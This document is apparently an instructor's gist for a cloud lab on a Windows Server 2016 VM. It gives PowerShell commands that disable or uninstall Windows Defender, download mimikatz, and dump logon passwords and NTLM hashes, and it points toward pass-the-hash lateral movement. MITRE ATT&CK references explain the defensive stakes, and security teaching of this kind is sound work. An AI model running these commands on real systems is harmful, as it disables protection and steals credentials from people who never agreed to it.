@codingoutloud
Last active December 16, 2023 15:43
Windows Server 2016 lab
# For educational purposes only
## STEP 0 - Create a Windows VM in the cloud, such as a Windows 2016 Server in Azure, with RDP enabled
Log in via RDP
Open PowerShell as Administrator
If you want to poke around in the local PowerShell help:
Get-Help curl
The curl command is familiar to many, but in PowerShell it is really an alias:
Get-Alias curl
You will probably want this (forces TLS 1.2 for the downloads below):
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
## STEP 1 - Defeat Windows Antimalware on Windows Server
This is syntactically correct, but doesn't succeed if you have antivirus software running:
curl https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -Outfile mm.zip
# Don't think this works! Try an explicit path instead:
Add-MpPreference -ExclusionPath .
Set-MpPreference -ExclusionPath C:\Users\mimikatz # YOUR PATH MUST GO IN
Get-MpComputerStatus
Get-MpComputerStatus | select RealTimeProtectionEnabled
Set-MpPreference -DisableRealtimeMonitoring $true
Get-MpComputerStatus | select RealTimeProtectionEnabled
# Nuclear option if the more surgical commands above do not work
# May be more valuable on other operating systems or versions
Uninstall-WindowsFeature -Name Windows-Defender # nuclear option
Restart-Computer
## STEP 2 - DOWNLOAD and UNZIP MIMIKATZ
# The link you want to download for this lab is a pre-built zip file - to find latest, go here:
# https://github.com/gentilkiwi/mimikatz/releases
# and then search for
# mimikatz_trunk.zip
# The full-path link to mimikatz_trunk.zip is what you want. As of this update (Nov 2023) here's the full-path link:
# https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip
# adjust to latest download file from https://github.com/gentilkiwi/mimikatz/releases
curl https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -Outfile mm.zip
Unblock-File .\mm.zip
Expand-Archive .\mm.zip
## STEP 3 - Use Mimikatz
cd mm # Expand-Archive extracts mm.zip into a folder named after the archive
cd x64
.\mimikatz.exe
.\mimikatz.exe "sekurlsa::logonpasswords" "exit"
.\mimikatz.exe "sekurlsa::logonpasswords" "exit" | Select-String "NTLM"
Or consider `start .\mimikatz.exe` to run it in its own window and type commands interactively:
?
hostname
answer
vault::list
log hack.log
privilege::debug
sekurlsa::logonpasswords
## STEP 4 - Stuff we don't cover
Learn more about mimikatz here:
https://github.com/gentilkiwi/mimikatz/
or on YouTube
Use the captured NTLM hash with the known "pass the hash" exploit
## MISC
Generate a 32-character password from the Azure Cloud Shell bash command line:
openssl rand -base64 32
openssl rand 200 | tr -dc '!@#$%^._A-Za-z0-9-' | cut -c 1-32
NTLM hash generators (you give a password, it produces an NTLM hash)
--> I can't vouch for any of these so please use one of the above password generators to create a random one for this purpose - don't give it your real one, or at least change it right after if you do (and never use it again)
https://codebeautify.org/ntlm-hash-generator
https://www.ipvoid.com/ntlm-generator/
https://www.browserling.com/tools/ntlm-hash
Reset password on Windows Server VM (not in domain) from command line (because copy/paste into the password reset box may not work)
net user administrateur "t/C7Wp3OJ+Sfg2WkadfxZ5weyvJ/v9J0CsOHQfUg+sQ="
Here is more info about WHY the Mimikatz NTLM hash discovery is so powerful:
1. Use Alternate Authentication Material: Pass the Hash, Sub-technique T1550.002 - Enterprise | MITRE ATT&CK®
https://attack.mitre.org/techniques/T1550/002/
2. Credentials from Password Stores, Technique T1555 - Enterprise | MITRE ATT&CK®
https://attack.mitre.org/techniques/T1555/
3. The MITRE ATT&CK Framework: Credential Access | Tripwire
https://www.tripwire.com/state-of-security/the-mitre-attck-framework-credential-access#:~:text=The%20goal%20here%20is%20making%20password%20cracking%20difficult,time%20it%20would%20take%20to%20crack%20the%20password.
The first one above is about the famous “pass the hash” hack which can allow for “lateral movement” (https://attack.mitre.org/tactics/TA0008/) once you’ve breached one VM.
The second is about accessing password stores generally, and the third explains why you want passwords to be HARD TO REVERSE (“The goal here is making password cracking difficult for attackers”).